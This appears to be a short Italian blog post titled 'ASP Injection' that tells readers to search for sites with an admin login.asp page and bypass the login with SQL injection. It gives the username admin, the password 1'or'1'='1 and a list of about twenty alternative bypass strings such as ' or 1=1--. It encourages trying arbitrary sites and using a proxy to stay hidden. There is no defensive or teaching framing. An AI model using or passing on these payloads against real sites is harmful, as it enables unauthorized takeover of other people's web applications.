ASP Injection
Per fare una Asp Injection dobbiamo usare il nostro browser Internet e dobbiamo scrivere nella barra degli indirizzi:
admin login.asp
Scegliere un sito qualsiasi e in username o Nome utente & Password scrivete:
Username : admin
Password : 1'or'1'='1
Se non dovesse funzionare scegliete un'altro sito oppure provate con questi altri codici:
' or a=a--
' or 1=1--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
Questo tipo di attacco permette di controllare un sito creato in ASP e di prendere il controllo, siate sempre proxaty e non fate LAMERATE!
Iscriviti a:
Commenti sul post (Atom)
Nessun commento:
Posta un commento